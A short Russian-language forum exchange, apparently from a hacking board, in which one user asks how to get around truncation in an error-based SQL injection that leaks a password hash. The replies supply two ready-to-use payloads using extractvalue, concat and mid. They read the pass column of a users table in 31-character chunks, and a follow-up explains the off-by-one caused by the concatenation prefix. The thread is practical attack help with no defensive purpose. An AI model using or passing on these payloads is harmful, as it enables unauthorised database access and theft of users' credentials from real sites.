09.01.2014, 21:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от Massay
Massay said:
Привет всем!)
Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида ""
Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
and extractvalue(rand(),concat(0x3a,(select mid(pass,1,31) from server.users limit 1,1))))--
and extractvalue(rand(),concat(0x3a,(select mid(pass,32,31) from server.users limit 1,1))))--
Сообщение от K800
K800 said:
У этого хэша 31 символ, а не 32
У него еще символ на конкатенацию ушел
|
|
|
|